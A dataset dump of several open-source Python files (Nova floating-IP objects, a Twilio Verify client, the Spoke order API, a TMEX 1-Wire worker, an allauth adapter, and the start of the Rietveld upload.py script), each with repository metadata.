text
stringlengths 4
1.02M
| meta
dict |
---|---|
from nova import db
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
FLOATING_IP_OPTIONAL_ATTRS = ['fixed_ip']
# TODO(berrange): Remove NovaObjectDictCompat
class FloatingIP(obj_base.NovaPersistentObject, obj_base.NovaObject,
obj_base.NovaObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: Added _get_addresses_by_instance_uuid()
# Version 1.2: FixedIP <= version 1.2
# Version 1.3: FixedIP <= version 1.3
# Version 1.4: FixedIP <= version 1.4
# Version 1.5: FixedIP <= version 1.5
# Version 1.6: FixedIP <= version 1.6
VERSION = '1.6'
fields = {
'id': fields.IntegerField(),
'address': fields.IPAddressField(),
'fixed_ip_id': fields.IntegerField(nullable=True),
'project_id': fields.UUIDField(nullable=True),
'host': fields.StringField(nullable=True),
'auto_assigned': fields.BooleanField(),
'pool': fields.StringField(nullable=True),
'interface': fields.StringField(nullable=True),
'fixed_ip': fields.ObjectField('FixedIP', nullable=True),
}
obj_relationships = {
'fixed_ip': [('1.0', '1.1'), ('1.2', '1.2'), ('1.3', '1.3'),
('1.4', '1.4'), ('1.5', '1.5'), ('1.6', '1.6')],
}
@staticmethod
def _from_db_object(context, floatingip, db_floatingip,
expected_attrs=None):
if expected_attrs is None:
expected_attrs = []
for field in floatingip.fields:
if field not in FLOATING_IP_OPTIONAL_ATTRS:
floatingip[field] = db_floatingip[field]
if ('fixed_ip' in expected_attrs and
db_floatingip['fixed_ip'] is not None):
floatingip.fixed_ip = objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_floatingip['fixed_ip'])
floatingip._context = context
floatingip.obj_reset_changes()
return floatingip
def obj_load_attr(self, attrname):
if attrname not in FLOATING_IP_OPTIONAL_ATTRS:
raise exception.ObjectActionError(
action='obj_load_attr',
reason='attribute %s is not lazy-loadable' % attrname)
if not self._context:
raise exception.OrphanedObjectError(method='obj_load_attr',
objtype=self.obj_name())
if self.fixed_ip_id is not None:
self.fixed_ip = objects.FixedIP.get_by_id(
self._context, self.fixed_ip_id, expected_attrs=['network'])
else:
self.fixed_ip = None
@obj_base.remotable_classmethod
def get_by_id(cls, context, id):
db_floatingip = db.floating_ip_get(context, id)
# XXX joins fixed.instance
return cls._from_db_object(context, cls(context), db_floatingip,
expected_attrs=['fixed_ip'])
@obj_base.remotable_classmethod
def get_by_address(cls, context, address):
db_floatingip = db.floating_ip_get_by_address(context, str(address))
return cls._from_db_object(context, cls(context), db_floatingip)
@obj_base.remotable_classmethod
def get_pool_names(cls, context):
return [x['name'] for x in db.floating_ip_get_pools(context)]
@obj_base.remotable_classmethod
def allocate_address(cls, context, project_id, pool, auto_assigned=False):
return db.floating_ip_allocate_address(context, project_id, pool,
auto_assigned=auto_assigned)
@obj_base.remotable_classmethod
def associate(cls, context, floating_address, fixed_address, host):
db_fixed = db.floating_ip_fixed_ip_associate(context,
str(floating_address),
str(fixed_address),
host)
if db_fixed is None:
return None
floating = FloatingIP(
context=context, address=floating_address, host=host,
fixed_ip_id=db_fixed['id'],
fixed_ip=objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_fixed,
expected_attrs=['network']))
return floating
@obj_base.remotable_classmethod
def deallocate(cls, context, address):
return db.floating_ip_deallocate(context, str(address))
@obj_base.remotable_classmethod
def destroy(cls, context, address):
db.floating_ip_destroy(context, str(address))
@obj_base.remotable_classmethod
def disassociate(cls, context, address):
db_fixed = db.floating_ip_disassociate(context, str(address))
return cls(context=context, address=address,
fixed_ip_id=db_fixed['id'],
fixed_ip=objects.FixedIP._from_db_object(
context, objects.FixedIP(context), db_fixed,
expected_attrs=['network']))
@obj_base.remotable_classmethod
def _get_addresses_by_instance_uuid(cls, context, instance_uuid):
return db.instance_floating_address_get_all(context, instance_uuid)
@classmethod
def get_addresses_by_instance(cls, context, instance):
return cls._get_addresses_by_instance_uuid(context, instance['uuid'])
@obj_base.remotable
def save(self, context):
updates = self.obj_get_changes()
if 'address' in updates:
raise exception.ObjectActionError(action='save',
reason='address is not mutable')
if 'fixed_ip_id' in updates:
reason = 'fixed_ip_id is not mutable'
raise exception.ObjectActionError(action='save', reason=reason)
# NOTE(danms): Make sure we don't pass the calculated fixed_ip
# relationship to the DB update method
updates.pop('fixed_ip', None)
db_floatingip = db.floating_ip_update(context, str(self.address),
updates)
self._from_db_object(context, self, db_floatingip)
class FloatingIPList(obj_base.ObjectListBase, obj_base.NovaObject):
# Version 1.3: FloatingIP 1.2
# Version 1.4: FloatingIP 1.3
# Version 1.5: FloatingIP 1.4
# Version 1.6: FloatingIP 1.5
# Version 1.7: FloatingIP 1.6
fields = {
'objects': fields.ListOfObjectsField('FloatingIP'),
}
child_versions = {
'1.0': '1.0',
'1.1': '1.1',
'1.2': '1.1',
'1.3': '1.2',
'1.4': '1.3',
'1.5': '1.4',
'1.6': '1.5',
'1.7': '1.6',
}
VERSION = '1.7'
@obj_base.remotable_classmethod
def get_all(cls, context):
db_floatingips = db.floating_ip_get_all(context)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_host(cls, context, host):
db_floatingips = db.floating_ip_get_all_by_host(context, host)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_project(cls, context, project_id):
db_floatingips = db.floating_ip_get_all_by_project(context, project_id)
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_fixed_address(cls, context, fixed_address):
db_floatingips = db.floating_ip_get_by_fixed_address(
context, str(fixed_address))
return obj_base.obj_make_list(context, cls(context),
objects.FloatingIP, db_floatingips)
@obj_base.remotable_classmethod
def get_by_fixed_ip_id(cls, context, fixed_ip_id):
db_floatingips = db.floating_ip_get_by_fixed_ip_id(context,
fixed_ip_id)
return obj_base.obj_make_list(context, cls(), FloatingIP,
db_floatingips)
@staticmethod
def make_ip_info(address, pool, interface):
return {'address': str(address),
'pool': pool,
'interface': interface}
@obj_base.remotable_classmethod
def create(cls, context, ip_info, want_result=False):
db_floatingips = db.floating_ip_bulk_create(context, ip_info,
want_result=want_result)
if want_result:
return obj_base.obj_make_list(context, cls(), FloatingIP,
db_floatingips)
@obj_base.remotable_classmethod
def destroy(cls, context, ips):
db.floating_ip_bulk_destroy(context, ips)
| {
"content_hash": "b533c5a28cb1d318c678a8b08418360b",
"timestamp": "",
"source": "github",
"line_count": 220,
"max_line_length": 79,
"avg_line_length": 40.86818181818182,
"alnum_prop": 0.5796908019130241,
"repo_name": "affo/nova",
"id": "1b5fb98ce4575d2712454477990f375dfadbd2c9",
"size": "9600",
"binary": false,
"copies": "10",
"ref": "refs/heads/master",
"path": "nova/objects/floating_ip.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "3223"
},
{
"name": "Python",
"bytes": "15659662"
},
{
"name": "Shell",
"bytes": "20716"
}
],
"symlink_target": ""
} |
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class FormList(ListResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version):
"""
Initialize the FormList
:param Version version: Version that contains the resource
:returns: twilio.rest.verify.v2.form.FormList
:rtype: twilio.rest.verify.v2.form.FormList
"""
super(FormList, self).__init__(version)
# Path Solution
self._solution = {}
def get(self, form_type):
"""
Constructs a FormContext
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
return FormContext(self._version, form_type=form_type, )
def __call__(self, form_type):
"""
Constructs a FormContext
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
return FormContext(self._version, form_type=form_type, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Verify.V2.FormList>'
class FormPage(Page):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, response, solution):
"""
Initialize the FormPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.verify.v2.form.FormPage
:rtype: twilio.rest.verify.v2.form.FormPage
"""
super(FormPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of FormInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.verify.v2.form.FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
return FormInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Verify.V2.FormPage>'
class FormContext(InstanceContext):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
def __init__(self, version, form_type):
"""
Initialize the FormContext
:param Version version: Version that contains the resource
:param form_type: The Type of this Form
:returns: twilio.rest.verify.v2.form.FormContext
:rtype: twilio.rest.verify.v2.form.FormContext
"""
super(FormContext, self).__init__(version)
# Path Solution
self._solution = {'form_type': form_type, }
self._uri = '/Forms/{form_type}'.format(**self._solution)
def fetch(self):
"""
Fetch the FormInstance
:returns: The fetched FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return FormInstance(self._version, payload, form_type=self._solution['form_type'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Verify.V2.FormContext {}>'.format(context)
class FormInstance(InstanceResource):
""" PLEASE NOTE that this class contains beta products that are subject to
change. Use them with caution. """
class FormTypes(object):
FORM_PUSH = "form-push"
def __init__(self, version, payload, form_type=None):
"""
Initialize the FormInstance
:returns: twilio.rest.verify.v2.form.FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
super(FormInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'form_type': payload.get('form_type'),
'forms': payload.get('forms'),
'form_meta': payload.get('form_meta'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'form_type': form_type or self._properties['form_type'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: FormContext for this FormInstance
:rtype: twilio.rest.verify.v2.form.FormContext
"""
if self._context is None:
self._context = FormContext(self._version, form_type=self._solution['form_type'], )
return self._context
@property
def form_type(self):
"""
:returns: The Type of this Form
:rtype: FormInstance.FormTypes
"""
return self._properties['form_type']
@property
def forms(self):
"""
:returns: Object that contains the available forms for this type.
:rtype: dict
"""
return self._properties['forms']
@property
def form_meta(self):
"""
:returns: Additional information for the available forms for this type.
:rtype: dict
"""
return self._properties['form_meta']
@property
def url(self):
"""
:returns: The URL to access the forms for this type.
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch the FormInstance
:returns: The fetched FormInstance
:rtype: twilio.rest.verify.v2.form.FormInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Verify.V2.FormInstance {}>'.format(context)
| {
"content_hash": "09730189da9e834ec491d219eec44919",
"timestamp": "",
"source": "github",
"line_count": 237,
"max_line_length": 95,
"avg_line_length": 28.953586497890296,
"alnum_prop": 0.59895074322355,
"repo_name": "twilio/twilio-python",
"id": "c5205741da28f41f13a1187b70a888cb2a505dc7",
"size": "6877",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "twilio/rest/verify/v2/form.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "234"
},
{
"name": "Makefile",
"bytes": "2157"
},
{
"name": "Python",
"bytes": "11241545"
}
],
"symlink_target": ""
} |
import sys, os
import json
import cPickle as pck
import itertools as it
# external libraries
import numpy as np
from ray import imio, evaluate, morpho
import networkx as nx
def synapses_to_network(vol, syns):
"""Compute a wiring diagram from a volume and synapse locations."""
network = nx.MultiDiGraph()
for pre, posts in syns:
for post in posts:
network.add_edge(vol[tuple(pre)], vol[tuple(post)])
return network
| {
"content_hash": "ef624bd51644476f74efdac598d59a21",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 71,
"avg_line_length": 25.22222222222222,
"alnum_prop": 0.7026431718061674,
"repo_name": "jni/synapse-geometry",
"id": "6f5ae7d4f01e77a5cb33559691a2e930d68c2e66",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "syngeo/wiring.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "13168"
}
],
"symlink_target": ""
} |
'''
Python interface to the Spoke API. This is the reference documentation; see
the included README for a higher level overview.
'''
import re
from lxml import etree
import requests
__version__ = '1.0.24'
__all__ = ['Case', 'Comment', 'Image', 'OrderInfo', 'PackSlipCustomInfo', 'Spoke', 'ValidationError', 'SpokeError']
# Validation code
class ValidationError(Exception):
'''
An exception that represents the case that parameter validation failed.
'''
pass
def passthrough(v):
return v
class Validator(object):
is_required = True
is_conditional = False
def __init__(self, inner=None):
if inner is None:
inner = passthrough
elif isinstance(inner, type):
t = inner
def type_validator(value):
if isinstance(value, t):
return value
return t(**value)
# XXX func name?
inner = type_validator
elif not isinstance(inner, Validator):
raise TypeError('inputs to validators must be None, types, or validators')
self.inner = inner
def __call__(self, value):
return self.inner(value)
class Required(Validator):
pass
class RequiredOnlyIfNot(Required):
""" This validator will require the key ONLY IF other keys are NOT present in
the payload.
This validator was added because threadless.com payloads use "ShippingMethod" whereas
Artist Shops payloads use "ShippingAccount" and "ShippingMethodId"
An example would be that SomeKey is only required if SomeOtherKey is not present in the payload:
"SomeKey" = RequiredOnlyIfNot(['SomeOtherKey'])
"""
is_required = True
is_conditional = True
other_keys = []
def __init__(self, other_keys=[], inner=None):
if not isinstance(other_keys, (tuple, list)):
other_keys = [other_keys]
self.other_keys = other_keys
super(RequiredOnlyIfNot, self).__init__(inner)
def __call__(self, value, d):
# if all of other_keys are present in the payload,
# then require don't require this field
if all([key in d.keys() for key in self.other_keys]):
self.is_required = False
return super(RequiredOnlyIfNot, self).__call__(value)
class Optional(Validator):
is_required = False
class Array(Validator):
def __call__(self, value):
if isinstance(value, list):
if len(value) == 0:
raise ValidationError('Empty array found where array required')
return [ self.inner(v) for v in value ]
else:
return [ self.inner(value) ]
class Enum(Validator):
def __init__(self, *values):
self.values = set(values)
def __call__(self, value):
if value not in self.values:
raise ValidationError('value "%s" not in enum' % str(value))
return value
def _validate(d, **validation_spec):
for k, v in d.items():
validator = validation_spec.pop(k, None)
if validator is None:
raise ValidationError('parameter "%s" not allowed' % k)
if validator.is_conditional: # conditional validators need the whole dictionary to look at other keys
d[k] = validator(v, d)
else:
d[k] = validator(v)
# it's possible that there's some conditional validators still in the validation_spec
# because their corresponding key isn't in the payload, so look over them and if all
# of their other_keys are present in the payload, then this conditional validator isn't required
for k, v in validation_spec.items():
if v.is_conditional and all([key in d.keys() for key in v.other_keys]):
v.is_required = False
validation_spec = dict((k, v) for k, v in validation_spec.items() if v.is_required)
if validation_spec:
first_key = sorted(validation_spec.keys())[0]
raise ValidationError('Missing required parameter "%s"' % first_key)
# Actual spoke classes
class Image(object):
'''
Represents an image resource. Used for PrintImage, QcImage, Logo, and PackSlip.
'''
def __init__(self, **kwargs):
'''
Required parameters:
ImageType - The type of image referenced (ex. jpg, png, etc)
Url - The URL of the image referenced.
'''
_validate(kwargs,
ImageType = Required(),
Url = Required(),
)
self.__dict__ = kwargs
class Comment(object):
'''
Represents a comment. Used for comments on Case objects.
'''
def __init__(self, **kwargs):
'''
Required parameters:
Type - One of 'Printer', 'Packaging'
CommentText - The actual comment text
'''
_validate(kwargs,
Type = Required(Enum('Printer', 'Packaging')),
CommentText = Required(),
)
self.__dict__ = kwargs
class PackSlipCustomInfo(object):
'''
Represents custom information for a pack slip.
'''
def __init__(self, **kwargs):
'''
Optional parameters:
Text1
Text2
Text3
Text4
Text5
Text6
'''
_validate(kwargs,
Text1 = Optional(),
Text2 = Optional(),
Text3 = Optional(),
Text4 = Optional(),
Text5 = Optional(),
Text6 = Optional(),
)
self.__dict__ = kwargs
class Prices(object):
'''
Specifies pricing data.
'''
def __init__(self, **kwargs):
'''
Optional parameters:
DisplayOnPackingSlip - Whether or not to show prices on the packing slip
CurrencySymbol - The symbol for the currency used
TaxCents - The tax price, expressed in cents
ShippingCents - The shipping price, expressed in cents
DiscountCents - The discount price (if any), expressed in cents
'''
_validate(kwargs,
DisplayOnPackingSlip = Optional(Enum('Yes', 'No')),
CurrencySymbol = Optional(),
TaxCents = Optional(),
ShippingCents = Optional(),
DiscountCents = Optional(),
)
self.__dict__ = kwargs
class OrderInfo(object):
'''
Specifies order information.
'''
def __init__(self, **kwargs):
'''
The following parameters are required:
FirstName
LastName
Address1
City
State - If the given country doesn't have states/provinces, send the city
PostalCode
CountryCode
OrderDate - May be a datetime.datetime object
PhoneNumber
The following parameters are optional:
Address2
PurchaseOrderNumber - internal PO number
GiftMessage
PackSlipCustomInfo - A PackSlipCustomInfo object
Prices - A Prices object
ShippingLabelReference1
ShippingLabelReference2
'''
_validate(kwargs,
FirstName = Required(),
LastName = Required(),
Address1 = Required(),
Address2 = Optional(),
City = Required(),
State = Required(),
PostalCode = Required(),
CountryCode = Required(),
OrderDate = Required(),
PhoneNumber = Required(),
PurchaseOrderNumber = Optional(),
GiftMessage = Optional(),
PackSlipCustomInfo = Optional(PackSlipCustomInfo),
Prices = Optional(Prices),
ShippingLabelReference1 = Optional(),
ShippingLabelReference2 = Optional(),
)
self.__dict__ = kwargs
class Case(object):
'''
A case represents a phone or tablet cover in the order.
'''
def __init__(self, **kwargs):
'''
The following parameters are required:
CaseId
CaseType
Quantity
PrintImage
The following parameters are optional:
QcImage
Prices
CurrencySymbol
RetailCents
DiscountCents
Comments
'''
_validate(kwargs,
CaseId = Required(),
CaseType = Required(Enum(
'bb9900bt', 'bbz10tough', 'kindlefirebt',
# apple / iphone
'iph3bt', 'iph3tough', 'iph4bt', 'iph4tough', 'iph4tough2',
'ipt4gbt', 'iph5bt', 'iph5vibe', 'iph5cbt', 'ipt5gbt',
'iph5xtreme', 'iph6bt', 'iph6tough', 'iph655bt', 'iph655tough',
'ipad4bt', 'ipadminitough', 'iph6sbtpresale',
'iph6stoughpresale', 'iph6splusbtpresale',
'iph6splustoughpresale', 'iph7bt', 'iph7tough', 'iph7plusbt',
'iph7plustough', 'iph8bt', 'iph8tough', 'iph10bt',
'iph10tough', 'iphxsmaxbt', 'iphxsmaxtough', 'iphxrbt',
'iphxrtough', 'iph11bt', 'iph11tough', 'iph11probt',
'iph11protough', 'iph11promaxbt', 'iph11promaxtough',
'iph12minibt', 'iph12minitough', 'iph12probt',
'iph12protough', 'iph12promaxbt', 'iph12promaxtough',
'iph13bt', 'iph13tough', 'iph13minibt', 'iph13minitough',
'iph13probt', 'iph13protough', 'iph13promaxbt', 'iph13promaxtough',
# buttons
'button-round-125', 'button-round-225',
# samsung / galaxy
'ssgn2tough', 'ssgs3vibe', 'ssgs4bt', 'ssgs4vibe',
'ssgs5bt', 'ssgn4bt', 'ssgs6vibe', 'ssgs6bt', 'ssgs7bt', 'ssgs8bt',
# magnets
'3x3-magnet', '4x4-magnet', '6x6-magnet',
# mugs
'mug11oz', 'mug15oz', 'mug12ozlatte', 'mug15oztravel',
# notebooks
'journal5x7blank', 'journal5x7ruled', 'spiral6x8ruled',
# stickers
'2x2-white', '3x3-white', '4x4-white', '6x6-white',
'2x2-clear', '3x3-clear', '4x4-clear', '6x6-clear',
# socks
'sock-small', 'sock-medium', 'sock-large',
# face masks
'facemasksmall', 'facemasklarge',
# puzzles
'8x10-puzzle', '11x14-puzzle', '16x20-puzzle',
)),
Quantity = Required(),
PrintImage = Required(Image),
QcImage = Optional(Image),
Prices = Optional(),
CurrencySymbol = Optional(),
RetailCents = Optional(),
DiscountCents = Optional(),
Comments = Optional(Array(Comment)),
)
self.__dict__ = kwargs
class SpokeError(Exception):
'''
Represents an error received from the spoke API.
'''
pass
class SpokeDuplicateOrder(SpokeError):
'''
Represents a duplicate order error returned from the Spoke API
'''
ERROR_REGEX = [
(re.compile(r"duplicate orderid", re.I), SpokeDuplicateOrder),
]
class Transport(object):
def __init__(self, url):
self.url = url
def send(self, request):
res = requests.post(self.url, data=request)
res.raise_for_status()
return res.content
ARRAY_CHILDREN_NAMES = dict(
Cases = 'CaseInfo',
Comments = 'Comment',
)
PRODUCTION_URL = 'https://api.spokecustom.com/order/submit'
STAGING_URL = 'https://api-staging.spokecustom.com/order/submit'
class Spoke(object):
'''
The main spoke request object. It contains any
request parameters that won't change between requests.
'''
def __init__(self, **kwargs):
'''
The following fields are required:
production - Whether or not to use the production API
Customer - Your customer ID
Key - Your customer key
The following fields are optional:
transport - A custom transport object. Used mainly for testing and debugging; be warned, here be dragons
Logo
'''
_validate(kwargs,
production = Required(),
transport = Optional(),
Customer = Required(),
Key = Required(),
Logo = Optional(Image),
)
self.__dict__ = kwargs
self.transport = self._create_transport()
def _create_transport(self):
if hasattr(self, 'transport'):
return self.transport
elif self.production:
return Transport(PRODUCTION_URL)
else:
return Transport(STAGING_URL)
def _generate_tree(self, tag_name, serializers, node):
if isinstance(node, list):
elements = etree.Element(tag_name)
for child in node:
elements.append(self._generate_tree(ARRAY_CHILDREN_NAMES[tag_name], serializers, child))
return elements
elif isinstance(node, dict):
parent = etree.Element(tag_name)
for tag_name, subtree in node.items():
parent.append(self._generate_tree(tag_name, serializers, subtree))
return parent
elif type(node) in serializers:
serializer = serializers[type(node)]
return serializer(tag_name, node)
else:
element = etree.Element(tag_name)
if not isinstance(node, basestring):
node = str(node)
element.text = node
return element
def _generate_request(self, RequestType, Order):
def serialize_it(tag_name, value):
return self._generate_tree(tag_name, serializers, value.__dict__)
serializers = {
Case : serialize_it,
Image : serialize_it,
OrderInfo : serialize_it,
Comment : serialize_it,
PackSlipCustomInfo : serialize_it,
Prices : serialize_it,
}
request = self._generate_tree('Request', serializers, dict(
Customer = self.Customer,
RequestType = RequestType,
Key = self.Key,
Order = Order,
))
return etree.tostring(request, pretty_print=True)
def _send_request(self, request):
res = self.transport.send(request)
tree = etree.fromstring(res)
result = tree.xpath('//result')[0].text
if result == 'Success':
immc_id = int(tree.xpath('//immc_id')[0].text)
return dict(immc_id = immc_id)
else:
message = tree.xpath('//message')[0].text
for regex, exception_class in ERROR_REGEX:
if regex.match(message):
raise exception_class(message)
raise SpokeError(message)
def new(self, **kwargs):
'''
Creates a new order. If there is a problem creating the order,
a SpokeError is raised. Otherwise, a dictionary is returned. The
returned dictionary is guaranteed to have an immc_id key-value pair,
which contains the Spoke ID for your order. More key-value pairs may
be present, but they are not guaranteed and their presence may change
in successive versions of this module. Any key-value pairs that appear
in this documentation, however, are guaranteed to appear in successive
versions, barring any changes in the Spoke API itself.
The following fields are required:
OrderId - An internal order ID
ShippingMethod - The shipping method to use; must be one of 'FirstClass', 'PriorityMail', 'TrackedDelivery', 'SecondDay', 'Overnight'
OrderInfo - An OrderInfo object
Cases - A list of Case objects
The following fields are optional:
PackSlip - A PackSlip object
Comments - A list of Comments objects
'''
shipping_method_map = dict(
FirstClass = 'FC',
PriorityMail = 'PM',
TrackedDelivery = 'TD',
SecondDay = 'SD',
Overnight = 'ON',
)
_validate(kwargs,
OrderId = Required(), # XXX number
ShippingMethod = RequiredOnlyIfNot(['ShippingAccount', 'ShippingMethodId'], Enum('FirstClass', 'PriorityMail', 'TrackedDelivery', 'SecondDay', 'Overnight')),
ShippingMethodId = RequiredOnlyIfNot(['ShippingMethod']),
ShippingAccount = RequiredOnlyIfNot(['ShippingMethod']),
PackSlip = Optional(Image),
Comments = Optional(Array(Comment)),
OrderInfo = Required(OrderInfo),
Cases = Required(Array(Case)),
)
if "ShippingMethod" in kwargs:
kwargs['ShippingMethod'] = shipping_method_map[ kwargs['ShippingMethod'] ]
# XXX OrderDate (date or datetime?)
request = self._generate_request(
RequestType = 'New',
Order = kwargs,
)
return self._send_request(request)
def update(self, **kwargs):
'''
Updates an existing order. If there is a problem
updating the order, a SpokeError is raised. Otherwise,
a dictionary of key-value pairs of the same form as the
one returned by new is returned.
Required parameters:
OrderId
OrderInfo
'''
_validate(kwargs,
OrderId = Required(), # XXX number
OrderInfo = Required(OrderInfo)
)
request = self._generate_request(
RequestType = 'Update',
Order = kwargs,
)
return self._send_request(request)
def cancel(self, OrderId):
'''
Cancels an existing order. If there is a problem,
raises a SpokeError. Otherwise, returns a dictionary
of the same form as the one returned by new.
'''
request = self._generate_request(
RequestType = 'Cancel',
Order = dict(OrderId = OrderId),
)
return self._send_request(request)
| {
"content_hash": "1032808857df7babcf229be9afbcc869",
"timestamp": "",
"source": "github",
"line_count": 570,
"max_line_length": 171,
"avg_line_length": 32.940350877192984,
"alnum_prop": 0.5451640391989774,
"repo_name": "Threadless/python-spoke",
"id": "aece1ce9a3fa284fa459c0eccd323addf57c36ca",
"size": "18776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spoke/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38581"
}
],
"symlink_target": ""
} |
import time
import multiprocessing
from collections import namedtuple
from tmex import Session, TMEXException
Command = namedtuple('Command', ['command', 'deviceId'])
Result = namedtuple('Result', ['command', 'deviceId', 'result'])
def oneWireWorker(channel, port=0):
run = True
try:
session = Session(port=port)
devices = session.enumrate()
except TMEXException, e:
channel.send(e)
run = False
while run:
if channel.poll():
obj = channel.recv()
if isinstance(obj, Command):
if obj.command == 'exit':
run = False
elif obj.command == 'enumerate':
try:
devices = session.enumrate()
for deviceId, information in devices.iteritems():
channel.send(Result('enumerate', deviceId, information))
except TMEXException, e:
channel.send(e)
elif obj.command == 'read':
try:
readout = session.readDevice(obj.deviceId, enableWireLeveling=True)
channel.send(Result('read', obj.deviceId, readout))
except ValueError:
channel.send(TMEXException('Invalid id'))
except TMEXException, e:
channel.send(e)
else:
time.sleep(0.1)
try:
channel.send(Result('exit', None, None))
except IOError:
pass
| {
"content_hash": "881a14af2d45d859b73e9e12ee60dbeb",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 91,
"avg_line_length": 35.52272727272727,
"alnum_prop": 0.5169545745361485,
"repo_name": "valnoverm/pytmex-git",
"id": "b0e94246b009a3534afa06cece2f43e532d05b1b",
"size": "1563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qt/worker.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29728"
}
],
"symlink_target": ""
} |
from allauth.utils import (import_attribute,
get_user_model,
valid_email_or_none)
import app_settings
class DefaultSocialAccountAdapter(object):
def pre_social_login(self, request, sociallogin):
"""
Invoked just after a user successfully authenticates via a
social provider, but before the login is actually processed
(and before the pre_social_login signal is emitted).
You can use this hook to intervene, e.g. abort the login by
raising an ImmediateHttpResponse
Why both an adapter hook and the signal? Intervening in
e.g. the flow from within a signal handler is bad -- multiple
handlers may be active and are executed in undetermined order.
"""
pass
def populate_new_user(self,
username=None,
first_name=None,
last_name=None,
email=None,
name=None):
"""
Spawns a new User instance, safely and leniently populating
several common fields.
"""
user = get_user_model()()
user.username = username or ''
user.email = valid_email_or_none(email) or ''
name_parts= (name or '').partition(' ')
user.first_name = first_name or name_parts[0]
user.last_name = last_name or name_parts[2]
return user
def get_adapter():
return import_attribute(app_settings.ADAPTER)()
| {
"content_hash": "dd86471cfb4cd8b8cf8b80d1e9df5756",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 70,
"avg_line_length": 33.65217391304348,
"alnum_prop": 0.5742894056847545,
"repo_name": "Suite5/DataColibri",
"id": "266532126c0d549917105eb45e9be67d6f03ea3a",
"size": "1548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "allauth/socialaccount/adapter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "381"
},
{
"name": "CSS",
"bytes": "944246"
},
{
"name": "HTML",
"bytes": "566711"
},
{
"name": "JavaScript",
"bytes": "1510227"
},
{
"name": "PHP",
"bytes": "972"
},
{
"name": "Python",
"bytes": "1046512"
},
{
"name": "Shell",
"bytes": "79"
}
],
"symlink_target": ""
} |
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import ConfigParser
import cookielib
import fnmatch
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
try:
import keyring
except ImportError:
keyring = None
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# The account type used for authentication.
# This line could be changed by the review server (see handler for
# upload.py).
AUTH_ACCOUNT_TYPE = "GOOGLE"
# URL of the default review server. As for AUTH_ACCOUNT_TYPE, this line could be
# changed by the review server (see handler for upload.py).
DEFAULT_REVIEW_SERVER = " codereview.arcbees.com"
# Max size of patch or base file.
